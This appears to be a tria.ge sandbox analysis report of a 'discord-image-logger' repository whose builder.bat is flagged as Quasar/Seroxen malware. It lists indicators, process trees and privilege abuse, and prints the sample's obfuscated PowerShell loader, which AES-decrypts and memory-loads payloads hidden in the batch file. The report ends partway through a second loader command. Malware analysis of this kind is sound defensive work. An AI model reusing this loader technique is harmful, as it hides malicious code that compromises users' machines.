Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
10discord-im...er.bat
windows7-x64
10discord-im...er.bat
windows10-2004-x64
10discord-im...bug.py
windows7-x64
3discord-im...bug.py
windows10-2004-x64
3discord-im...ers.py
windows7-x64
3discord-im...ers.py
windows10-2004-x64
3discord-im...ken.py
windows7-x64
3discord-im...ken.py
windows10-2004-x64
3discord-im...ion.py
windows7-x64
3discord-im...ion.py
windows10-2004-x64
3discord-im...tup.py
windows7-x64
3discord-im...tup.py
windows10-2004-x64
3discord-im...nfo.py
windows7-x64
3discord-im...nfo.py
windows10-2004-x64
3discord-im...fig.py
windows7-x64
3discord-im...fig.py
windows10-2004-x64
3discord-im...ain.py
windows7-x64
3discord-im...ain.py
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
19/03/2025, 22:07
Behavioral task
behavioral1
Sample
discord-image-logger-main/builder.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
discord-image-logger-main/builder.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
discord-image-logger-main/src/components/antidebug.py
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
discord-image-logger-main/src/components/antidebug.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral5
Sample
discord-image-logger-main/src/components/browsers.py
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
discord-image-logger-main/src/components/browsers.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
discord-image-logger-main/src/components/discordtoken.py
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
discord-image-logger-main/src/components/discordtoken.py
Resource
win10v2004-20250313-en
Behavioral task
behavioral9
Sample
discord-image-logger-main/src/components/injection.py
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
discord-image-logger-main/src/components/injection.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral11
Sample
discord-image-logger-main/src/components/startup.py
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
discord-image-logger-main/src/components/startup.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral13
Sample
discord-image-logger-main/src/components/systeminfo.py
Resource
win7-20241023-en
Behavioral task
behavioral14
Sample
discord-image-logger-main/src/components/systeminfo.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral15
Sample
discord-image-logger-main/src/config.py
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
discord-image-logger-main/src/config.py
Resource
win10v2004-20250314-en
Behavioral task
behavioral17
Sample
discord-image-logger-main/src/main.py
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
discord-image-logger-main/src/main.py
Resource
win10v2004-20250314-en
General
-
Target
discord-image-logger-main/builder.bat
-
Size
14.9MB
-
MD5
70a53c5ec35eefae927a0c413a89937a
-
SHA1
1bc9a22903968bfc05b87c1082a5c4242802d4dd
-
SHA256
a7aa6fa77e4931544a6966ef435400c52a79af300a548aca4e9c67f72218ac2d
-
SHA512
c712f2b98b0eb8c4808e4abcee0cc6100fc3e7d445f40208da0429b754148f190083ce247f183bb112083c15b06f466cbe573fe01f47de3d7958d8624e8d9aae
-
SSDEEP
49152:QYwuS617ST7nN2d57VTqUTm0AmK0jEHD5FQ/9gsyuEgPXiGncZwPnzLO1WtJHFi7:S
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/64-58-0x0000028420010000-0x00000284207CC000-memory.dmp family_quasar -
Seroxen family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 652 created 612 652 builder.bat.exe 5 PID 64 created 612 64 $sxr-powershell.exe 5 PID 64 created 612 64 $sxr-powershell.exe 5 PID 652 created 612 652 builder.bat.exe 5 PID 652 created 612 652 builder.bat.exe 5 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation builder.bat.exe -
Deletes itself 1 IoCs
pid Process 652 builder.bat.exe -
Executes dropped EXE 3 IoCs
pid Process 652 builder.bat.exe 64 $sxr-powershell.exe 1628 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1628 $sxr-powershell.exe 64 $sxr-powershell.exe -
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\ucrtbased.dll builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll builder.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\System32\ucrtbased.dll builder.bat.exe File created C:\Windows\System32\vcruntime140_1d.dll builder.bat.exe File created C:\Windows\System32\vcruntime140d.dll builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 652 set thread context of 3164 652 builder.bat.exe 98 PID 64 set thread context of 1332 64 $sxr-powershell.exe 100 PID 64 set thread context of 4128 64 $sxr-powershell.exe 102 PID 652 set thread context of 3152 652 builder.bat.exe 104 PID 652 set thread context of 2672 652 builder.bat.exe 105 -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe builder.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe builder.bat.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5600 PING.EXE 5480 cmd.exe -
Kills process with taskkill 1 IoCs
pid Process 5728 taskkill.exe -
Modifies data under HKEY_USERS 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7D0A41CE-5321-4893-8626-D23433574F28}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1742422473" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 19 Mar 2025 22:14:34 GMT" OfficeClickToRun.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5600 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 652 builder.bat.exe 652 builder.bat.exe 652 builder.bat.exe 3164 dllhost.exe 3164 dllhost.exe 3164 dllhost.exe 3164 dllhost.exe 652 builder.bat.exe 652 builder.bat.exe 64 $sxr-powershell.exe 64 $sxr-powershell.exe 64 $sxr-powershell.exe 64 $sxr-powershell.exe 1332 dllhost.exe 1332 dllhost.exe 1332 dllhost.exe 1332 dllhost.exe 64 $sxr-powershell.exe 64 $sxr-powershell.exe 1628 $sxr-powershell.exe 64 $sxr-powershell.exe 4128 dllhost.exe 4128 dllhost.exe 1628 $sxr-powershell.exe 1628 $sxr-powershell.exe 1628 $sxr-powershell.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe 4128 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeDebugPrivilege 652 builder.bat.exe Token: SeDebugPrivilege 652 builder.bat.exe Token: SeDebugPrivilege 3164 dllhost.exe Token: SeDebugPrivilege 64 $sxr-powershell.exe Token: SeDebugPrivilege 64 $sxr-powershell.exe Token: SeDebugPrivilege 1332 dllhost.exe Token: SeDebugPrivilege 1628 $sxr-powershell.exe Token: SeDebugPrivilege 64 $sxr-powershell.exe Token: SeDebugPrivilege 4128 dllhost.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeDebugPrivilege 652 builder.bat.exe Token: SeDebugPrivilege 3152 dllhost.exe Token: SeDebugPrivilege 652 builder.bat.exe Token: SeDebugPrivilege 2672 dllhost.exe Token: SeDebugPrivilege 5728 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 64 $sxr-powershell.exe 5496 Conhost.exe -
Suspicious use of UnmapMainImage 3 IoCs
pid Process 3928 RuntimeBroker.exe 3404 Explorer.EXE 3904 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3184 wrote to memory of 3128 3184 cmd.exe 89 PID 3184 wrote to memory of 3128 3184 cmd.exe 89 PID 3128 wrote to memory of 4268 3128 net.exe 90 PID 3128 wrote to memory of 4268 3128 net.exe 90 PID 3184 wrote to memory of 652 3184 cmd.exe 95 PID 3184 wrote to memory of 652 3184 cmd.exe 95 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 3164 652 builder.bat.exe 98 PID 652 wrote to memory of 64 652 builder.bat.exe 99 PID 652 wrote to memory of 64 652 builder.bat.exe 99 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1332 64 $sxr-powershell.exe 100 PID 64 wrote to memory of 1628 64 $sxr-powershell.exe 101 PID 64 wrote to memory of 1628 64 $sxr-powershell.exe 101 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 64 wrote to memory of 4128 64 $sxr-powershell.exe 102 PID 4128 wrote to memory of 612 4128 dllhost.exe 5 PID 4128 wrote to memory of 672 4128 dllhost.exe 7 PID 4128 wrote to memory of 952 4128 dllhost.exe 12 PID 4128 wrote to memory of 336 4128 dllhost.exe 13 PID 4128 wrote to memory of 740 4128 dllhost.exe 14 PID 4128 wrote to memory of 920 4128 dllhost.exe 15 PID 4128 wrote to memory of 1056 4128 dllhost.exe 16 PID 4128 wrote to memory of 1076 4128 dllhost.exe 18 PID 4128 wrote to memory of 1172 4128 dllhost.exe 19 PID 4128 wrote to memory of 1232 4128 dllhost.exe 20 PID 4128 wrote to memory of 1296 4128 dllhost.exe 21 PID 4128 wrote to memory of 1380 4128 dllhost.exe 22 PID 4128 wrote to memory of 1392 4128 dllhost.exe 23 PID 4128 wrote to memory of 1408 4128 dllhost.exe 24 PID 4128 wrote to memory of 1448 4128 dllhost.exe 25 PID 4128 wrote to memory of 1516 4128 dllhost.exe 26 PID 4128 wrote to memory of 1548 4128 dllhost.exe 27 PID 4128 wrote to memory of 1564 4128 dllhost.exe 28 PID 4128 wrote to memory of 1648 4128 dllhost.exe 29 PID 4128 wrote to memory of 1708 4128 dllhost.exe 30 PID 4128 wrote to memory of 1804 4128 dllhost.exe 31 PID 4128 wrote to memory of 1844 4128 dllhost.exe 32 PID 4128 wrote to memory of 1864 4128 dllhost.exe 33 PID 4128 wrote to memory of 1876 4128 dllhost.exe 34 PID 4128 wrote to memory of 1960 4128 dllhost.exe 35 PID 4128 wrote to memory of 1992 4128 dllhost.exe 36 PID 4128 wrote to memory of 1464 4128 dllhost.exe 37 PID 4128 wrote to memory of 2068 4128 dllhost.exe 39 PID 4128 wrote to memory of 2264 4128 dllhost.exe 40 PID 4128 wrote to memory of 2332 4128 dllhost.exe 41 PID 4128 wrote to memory of 2356 4128 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5812 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{94d05725-3899-46ae-b68d-fdb895f5138c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a0071ef-8a79-4095-ac2e-eacdbdc11058}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4d5c07b1-87bd-44c7-9f97-cb7e6304868b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c0343420-dc8f-4bd8-be63-95eb49e374cd}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ea85b9ad-3a1f-42b6-87c7-5dc41bbc66db}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:668
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1548
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1992
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2388
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3016
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3348
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat"2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4716
-
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VsYFF($UqIEP){ $cckBt=[System.Security.Cryptography.Aes]::Create(); $cckBt.Mode=[System.Security.Cryptography.CipherMode]::CBC; $cckBt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $cckBt.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UEGY9MIPrGN+l8HMK+EOWWOHd3i8s5ddQy0gjFJszf0='); $cckBt.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIU6Lrw5kmXrlY9ZdCP5WQ=='); $twFeA=$cckBt.CreateDecryptor(); $return_var=$twFeA.TransformFinalBlock($UqIEP, 0, $UqIEP.Length); $twFeA.Dispose(); $cckBt.Dispose(); $return_var;}function onOdy($UqIEP){ $DcweI=New-Object System.IO.MemoryStream(,$UqIEP); $sUfkw=New-Object System.IO.MemoryStream; $rNOwy=New-Object System.IO.Compression.GZipStream($DcweI, [IO.Compression.CompressionMode]::Decompress); $rNOwy.CopyTo($sUfkw); $rNOwy.Dispose(); $DcweI.Dispose(); $sUfkw.Dispose(); $sUfkw.ToArray();}function spGXl($UqIEP,$ZvarV){ $UbgZg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UqIEP); $oUCsb=$UbgZg.EntryPoint; $oUCsb.Invoke($null, $ZvarV);}$WAkYi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat').Split([Environment]::NewLine);foreach ($kjXpr in $WAkYi) { if ($kjXpr.StartsWith(':: ')) { $vbeRz=$kjXpr.Substring(4); break; }}$IzdcO=[string[]]$vbeRz.Split('\');$clAux=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[0])));$WNxAq=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[1])));spGXl $WNxAq (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));spGXl $clAux (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); 